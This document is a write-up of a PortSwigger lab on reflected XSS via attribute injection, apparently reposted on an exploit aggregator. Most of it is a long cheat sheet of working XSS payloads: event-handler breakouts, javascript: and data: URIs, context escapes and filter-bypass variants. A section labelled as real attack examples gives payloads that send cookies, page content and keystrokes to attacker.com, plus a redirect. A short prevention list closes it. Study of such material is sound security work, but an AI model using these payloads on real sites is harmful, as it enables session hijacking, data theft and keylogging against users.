Share
## https://sploitus.com/exploit?id=7A836EAE-19D0-5630-AEC3-F3CE790D46C8
# Reflected XSS - Attribute Injection

A simple demonstration of XSS vulnerability when angle brackets are HTML-encoded.

## Lab Description

This lab contains a reflected XSS vulnerability in the search blog functionality where angle brackets are HTML-encoded. The goal is to perform an XSS attack that injects an attribute and calls the alert function.

**Source:** PortSwigger Web Security Academy

## The Problem

The application encodes `` characters but doesn't properly handle quotes in HTML attributes.

```html


```

## Solution

**Payload:**
```
" onmouseover="alert(1)
```

**How to exploit:**

1. Go to the search functionality
2. Enter the payload: `" onmouseover="alert(1)`
3. Submit the search
4. Move your mouse over the search input field
5. Alert will pop up

## Why it works

The payload breaks out of the attribute and creates a new event handler:

```html


```
## Other payloads you can use

## Mouse Events
```
    " onmouseover="alert(1)
    " onmouseout="alert(1)
    " onmouseenter="alert(1)
    " onmouseleave="alert(1)
    " onmousemove="alert(1)
    " onmousedown="alert(1)
    " onmouseup="alert(1)
    " onclick="alert(1)
    " ondblclick="alert(1)
    " oncontextmenu="alert(1)
    " onwheel="alert(1)
```
## Keyboard Events
```
    " onkeydown="alert(1)
    " onkeyup="alert(1)
    " onkeypress="alert(1)
```
## Form Events
```
    " onfocus="alert(1)
    " onblur="alert(1)
    " onchange="alert(1)
    " oninput="alert(1)
    " onsubmit="alert(1)
    " onreset="alert(1)
    " oninvalid="alert(1)
    " onsearch="alert(1)
```
## Loading Events
```
    " onload="alert(1)
    " onerror="alert(1)
    " onabort="alert(1)
    " onloadstart="alert(1)
    " onloadend="alert(1)
    " onprogress="alert(1)
```
## Drag & Drop Events
```
" ondrag="alert(1)
" ondragstart="alert(1)
" ondragend="alert(1)
" ondragenter="alert(1)
" ondragleave="alert(1)
" ondragover="alert(1)
" ondrop="alert(1)
```
## Media Events
```
" onplay="alert(1)
" onpause="alert(1)
" onended="alert(1)
" onvolumechange="alert(1)
" onseeking="alert(1)
" onseeked="alert(1)
" ontimeupdate="alert(1)
" oncanplay="alert(1)
```
## Animation & Transition Events
```
" onanimationstart="alert(1)
" onanimationend="alert(1)
" onanimationiteration="alert(1)
" ontransitionend="alert(1)
" ontransitionstart="alert(1)
```
## Touch Events (Mobile)
```
" ontouchstart="alert(1)
" ontouchmove="alert(1)
" ontouchend="alert(1)
" ontouchcancel="alert(1)
```
## Other Events
```
" onresize="alert(1)
" onscroll="alert(1)
" oncut="alert(1)
" oncopy="alert(1)
" onpaste="alert(1)
" onbeforeunload="alert(1)
" onhashchange="alert(1)
" onpageshow="alert(1)
" onpagehide="alert(1)
" onpointerdown="alert(1)
" onpointerup="alert(1)
" onpointermove="alert(1)
```
## JavaScript Protocol (In href/src/action)
```
javascript:alert(1)
javascript:alert(document.cookie)
javascript:alert(document.domain)
javascript:eval('alert(1)')
javascript:void(alert(1))
```
## Data URI Schemes
```js
data:text/html,alert(1)
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html,
```
## Breaking Out of JavaScript Context
If you're already inside JavaScript code (between script tags or in JS string):

## String Context
```js
';alert(1);//
';alert(1);'
"+alert(1)+"
`+alert(1)+`
${alert(1)}
```
Object/Array Context
```js
});alert(1);//
];alert(1);//
```
Comment Bypass
```js
*/alert(1);//
```
Expression Contexts
Template Literals
```js
${alert(1)}
${alert`1`}
```
## JSON Context
```js
{"a":"a","b":"b"}};alert(1);//
```
## Advanced Attribute Injection

## With Single Quote
```js
    ' onmouseover='alert(1)
    ' onclick='alert(1)
    ' onfocus='alert(1)
```
## Without Quotes (Space-based)
```js
    onmouseover=alert(1)
    onclick=alert(1)
    onfocus=alert(1)
```
## Using Backticks
```js
    " onmouseover=`alert(1)`
```
## Polyglot Payloads (Work in Multiple Contexts)
```js
" onclick="alert(1)" "
' onclick='alert(1)' '
"onmouseover="alert(1)
```
## Special Attribute Contexts
## Form Actions
```js
" formaction="javascript:alert(1)
" action="javascript:alert(1)
Links
" href="javascript:alert(1)
```
## iFrame srcdoc
```js
    " srcdoc="alert(1)
    Case Variations (Bypass Filters)
    " OnMoUsEoVeR="alert(1)
    " ONCLICK="alert(1)
    " oNlOaD="alert(1)
    Alternative JavaScript Functions
    Instead of alert(1), you can use:
    confirm(1)
    prompt(1)
    console.log(1)
    document.write(1)
    eval('alert(1)')
    Function('alert(1)')()
    setTimeout('alert(1)',0)
    setInterval('alert(1)',0)
    location='javascript:alert(1)'
```
# Stealing Data (Real Attack Examples)
## Steal Cookies
```js
    " onmouseover="fetch('https://attacker.com?c='+document.cookie)
    " onclick="new Image().src='https://attacker.com?c='+document.cookie
```
## Steal Page Content
```js
    " onload="fetch('https://attacker.com',{method:'POST',body:document.body.innerHTML})
```
## Redirect
```js
    " onclick="location='https://attacker.com'
    Keylogger
    " onload="document.onkeypress=function(e){fetch('https://attacker.com?k='+e.key)}
    Context-Specific Payloads
    Inside Input Value
    " autofocus onfocus="alert(1)
    " accesskey="x" onclick="alert(1)
    Inside IMG src
    " onerror="alert(1)
    x" onerror="alert(1)
    Inside A href
    javascript:alert(1)
    " onclick="alert(1)" href="#
```
## How to prevent this

1. Always encode quotes in HTML attributes
2. Use Content Security Policy (CSP)
3. Validate user input
4. Use modern frameworks that auto-escape (React, Vue, Angular)